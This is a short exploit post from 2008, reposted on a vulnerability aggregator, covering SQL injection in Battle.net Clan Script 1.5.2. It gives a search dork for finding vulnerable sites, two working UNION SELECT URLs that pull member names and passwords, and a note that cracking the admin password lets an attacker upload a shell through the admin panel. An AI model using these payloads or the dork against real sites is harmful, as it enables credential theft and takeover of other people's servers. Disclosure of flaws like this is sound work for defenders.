Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20306
HistoryAug 07, 2008 - 12:00 a.m.

MyClan Sql Injection

2008-08-0700:00:00
vulners.com
28

#####################################################################################

MyClan Sql Injection

#####################################################################################

#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#Our Site : Http://IRCRASH.COM
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)
#####################################################################################

#Script Download : www.sourceforge.net/projects/haudenschilt

#DORK : Copyright A© 2005-2006 Battle.net Clan Script 1.5.2

#####################################################################################

[Bug]

#http://Site/index.php?page=members&showmember='+union+select+name,1,2,password+from+bcs_members/*
#http://Site/index.php?page=board&thread=-9999+union+select+0,1,password,name,4,5,6,7+from+bcs_members/*

[Note]

#If you inject and crack admin password you can upload shell in medal pasge in admin panel ;)

#####################################################################################

Site : Http://IRCRASH.COM

###################################### TNX GOD ######################################